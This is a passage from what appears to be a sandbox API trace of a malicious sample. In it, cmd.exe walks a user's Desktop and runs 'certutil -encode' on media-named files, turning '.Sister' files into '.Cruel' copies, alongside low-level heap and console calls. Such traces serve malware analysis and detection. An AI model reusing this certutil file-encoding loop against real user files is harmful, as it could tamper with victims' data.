lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cb80 [0224.317] FindClose (in: hFindFile=0x21ed8c7cb80 | out: hFindFile=0x21ed8c7cb80) returned 1 [0224.317] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0224.317] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0224.317] ??_V@YAXPEAX@Z () returned 0x1 [0224.317] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0224.388] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0224.388] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0224.389] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0224.389] GetProcessHeap () returned 0x21ed8c70000 [0224.389] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45bf0 [0224.389] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0224.389] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0224.389] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0224.389] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0224.389] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0224.389] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0224.389] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0224.389] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0224.389] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0224.389] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0224.389] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0224.389] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0224.389] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0224.390] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0224.390] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0224.390] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0224.390] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0224.390] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0224.390] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0224.390] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0224.390] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0224.390] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0224.390] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0224.390] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0224.390] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0224.390] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0224.390] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0224.390] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0224.390] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0224.390] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0224.390] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0224.390] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0224.390] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0224.390] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0224.390] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0224.390] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0224.390] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0224.390] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0224.390] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0224.391] GetProcessHeap () returned 0x21ed8c70000 [0224.391] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45bf0) returned 1 [0224.391] GetProcessHeap () returned 0x21ed8c70000 [0224.391] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c95a00 [0224.391] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0224.391] _get_osfhandle (_FileHandle=1) returned 0x50 [0224.391] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0224.464] _get_osfhandle (_FileHandle=0) returned 0x4c [0224.465] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0224.538] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"gwc793WO9abijU0o.flv.Sister\" \"gwc793WO9abijU0o.flv.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"gwc793WO9abijU0o.flv.Sister\" \"gwc793WO9abijU0o.flv.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"gwc793WO9abijU0o.flv.Sister\" \"gwc793WO9abijU0o.flv.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa4, hThread=0xa8, dwProcessId=0x6ec, dwThreadId=0x6d8)) returned 1 [0224.555] CloseHandle (hObject=0xa8) returned 1 [0224.555] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0224.555] GetProcessHeap () returned 0x21ed8c70000 [0224.555] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0224.555] GetEnvironmentStringsW () returned 0x21ed9980080* [0224.555] GetProcessHeap () returned 0x21ed8c70000 [0224.555] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0224.556] FreeEnvironmentStringsA (penv="=") returned 1 [0224.556] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0xffffffff) returned 0x0 [0225.902] GetExitCodeProcess (in: hProcess=0xa4, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0225.902] CloseHandle (hObject=0xa4) returned 1 [0225.902] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0225.902] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0225.902] GetProcessHeap () returned 0x21ed8c70000 [0225.902] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0225.903] GetEnvironmentStringsW () returned 0x21ed9980080* [0225.903] GetProcessHeap () returned 0x21ed8c70000 [0225.903] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0225.903] FreeEnvironmentStringsA (penv="=") returned 1 [0225.903] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0225.903] GetProcessHeap () returned 0x21ed8c70000 [0225.903] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0225.903] GetEnvironmentStringsW () returned 0x21ed9980080* [0225.903] GetProcessHeap () returned 0x21ed8c70000 [0225.903] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0225.904] FreeEnvironmentStringsA (penv="=") returned 1 [0225.904] GetProcessHeap () returned 0x21ed8c70000 [0225.904] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95a00) returned 1 [0225.904] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0225.904] ??_V@YAXPEAX@Z () returned 0x1 [0225.904] FindNextFileW (in: hFindFile=0x21ed8c7cb20, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7971430, ftCreationTime.dwHighDateTime=0x1d5e80d, ftLastAccessTime.dwLowDateTime=0x30ca2e90, ftLastAccessTime.dwHighDateTime=0x1d5e872, ftLastWriteTime.dwLowDateTime=0x30ca2e90, ftLastWriteTime.dwHighDateTime=0x1d5e872, nFileSizeHigh=0x0, nFileSizeLow=0x16a2d, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="hvO9HhgzXnxX2Pa-RAL.mp4.Sister", cAlternateFileName="")) returned 1 [0225.904] GetProcessHeap () returned 0x21ed8c70000 [0225.904] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d66bd0, Size=0x2b6) returned 0x21ed93b0c80 [0225.904] GetProcessHeap () returned 0x21ed8c70000 [0225.904] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b0c80) returned 0x2b6 [0225.904] GetProcessHeap () returned 0x21ed8c70000 [0225.904] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d683d0 [0225.904] GetProcessHeap () returned 0x21ed8c70000 [0225.904] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d683d0, Size=0x58) returned 0x21ed8d683d0 [0225.904] GetProcessHeap () returned 0x21ed8c70000 [0225.904] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d683d0) returned 0x58 [0225.904] GetProcessHeap () returned 0x21ed8c70000 [0225.904] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d68440 [0225.904] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0225.905] GetProcessHeap () returned 0x21ed8c70000 [0225.905] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4e) returned 0x21ed8c7d000 [0225.905] ??_V@YAXPEAX@Z () returned 0x1 [0225.905] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0225.905] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7ca60 [0225.905] FindClose (in: hFindFile=0x21ed8c7ca60 | out: hFindFile=0x21ed8c7ca60) returned 1 [0225.905] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cb80 [0225.905] FindClose (in: hFindFile=0x21ed8c7cb80 | out: hFindFile=0x21ed8c7cb80) returned 1 [0225.905] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xb128fe8f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xb128fe8f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7cee0 [0225.906] FindClose (in: hFindFile=0x21ed8c7cee0 | out: hFindFile=0x21ed8c7cee0) returned 1 [0225.906] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\hvO9HhgzXnxX2Pa-RAL.mp4.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7971430, ftCreationTime.dwHighDateTime=0x1d5e80d, ftLastAccessTime.dwLowDateTime=0x30ca2e90, ftLastAccessTime.dwHighDateTime=0x1d5e872, ftLastWriteTime.dwLowDateTime=0x30ca2e90, ftLastWriteTime.dwHighDateTime=0x1d5e872, nFileSizeHigh=0x0, nFileSizeLow=0x16a2d, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="hvO9HhgzXnxX2Pa-RAL.mp4.Sister", cAlternateFileName="HVO9HH~1.SIS")) returned 0x21ed8c7cbe0 [0225.906] FindClose (in: hFindFile=0x21ed8c7cbe0 | out: hFindFile=0x21ed8c7cbe0) returned 1 [0225.906] _wcsnicmp (_String1="HVO9HH~1.SIS", _String2="hvO9HhgzXnxX2Pa-RAL.mp4.Sister", _MaxCount=0x1e) returned 23 [0225.906] malloc (_Size=0x1ff9c) returned 0x21ed97dfbb0 [0225.906] ??_V@YAXPEAX@Z () returned 0x21ed97dfbb0 [0225.906] GetProcessHeap () returned 0x21ed8c70000 [0225.906] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x40) returned 0x21ed8c7bcb0 [0225.906] ??_V@YAXPEAX@Z () returned 0x1 [0225.906] ??_V@YAXPEAX@Z () returned 0x1 [0225.906] GetProcessHeap () returned 0x21ed8c70000 [0225.907] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d68440, Size=0x260) returned 0x21ed8d68440 [0225.907] GetProcessHeap () returned 0x21ed8c70000 [0225.907] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d68440) returned 0x260 [0225.907] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0225.907] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.907] GetFileType (hFile=0x50) returned 0x2 [0225.907] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0225.907] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0225.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.928] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0225.981] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0225.981] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0225.981] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0225.981] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0225.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.981] GetFileType (hFile=0x50) returned 0x2 [0225.981] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0225.981] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0225.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.992] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0226.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0226.015] GetFileType (hFile=0x50) returned 0x2 [0226.015] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0226.015] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0226.027] _get_osfhandle (_FileHandle=1) returned 0x50 [0226.027] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d683e0*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed8d683e0*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0226.031] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"hvO9HhgzXnxX2Pa-RAL.mp4.Sister\" \"hvO9HhgzXnxX2Pa-RAL.mp4.Cruel\" ") returned 74 [0226.031] _get_osfhandle (_FileHandle=1) returned 0x50 [0226.031] GetFileType (hFile=0x50) returned 0x2 [0226.031] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0226.031] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0226.034] _get_osfhandle (_FileHandle=1) returned 0x50 [0226.034] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x4a, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x4a) returned 1 [0226.057] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0226.057] _get_osfhandle (_FileHandle=1) returned 0x50 [0226.057] GetFileType (hFile=0x50) returned 0x2 [0226.057] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0226.057] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0226.057] _get_osfhandle (_FileHandle=1) returned 0x50 [0226.057] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0226.062] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0226.063] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0226.063] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0226.063] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0226.063] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0226.063] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0226.063] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0226.063] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0226.063] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0226.063] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0226.063] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0226.063] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0226.063] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0226.065] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0226.065] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0226.065] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0226.065] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0226.065] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0226.065] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0226.065] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0226.065] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0226.065] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0226.065] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0226.065] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0226.065] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0226.065] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0226.065] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0226.066] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0226.066] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0226.066] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0226.066] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0226.066] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0226.066] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0226.066] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0226.066] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0226.066] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0226.066] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0226.066] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0226.066] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0226.066] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0226.066] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0226.066] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0226.066] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0226.066] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0226.066] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0226.066] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0226.066] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0226.066] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0226.066] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0226.066] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0226.067] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0226.067] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0226.067] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0226.067] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0226.067] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0226.067] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0226.067] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0226.067] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0226.067] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0226.067] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0226.067] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0226.067] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0226.067] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0226.067] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0226.067] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0226.067] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0226.067] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0226.068] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0226.068] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0226.068] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0226.068] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0226.068] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0226.068] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0226.068] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0226.068] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0226.068] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0226.068] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0226.068] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0226.068] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0226.068] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0226.068] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0226.068] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0226.068] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0226.068] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0226.068] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0226.068] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0226.068] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0226.069] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0226.069] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0226.069] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0226.069] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0226.069] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0226.069] ??_V@YAXPEAX@Z () returned 0x1 [0226.069] GetProcessHeap () returned 0x21ed8c70000 [0226.069] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8d09940 [0226.069] GetProcessHeap () returned 0x21ed8c70000 [0226.069] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb6) returned 0x21ed8c961c0 [0226.069] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0226.069] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0226.069] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0226.069] GetProcessHeap () returned 0x21ed8c70000 [0226.069] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed92a1070 [0226.075] SetErrorMode (uMode=0x0) returned 0x0 [0226.075] SetErrorMode (uMode=0x1) returned 0x0 [0226.075] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, 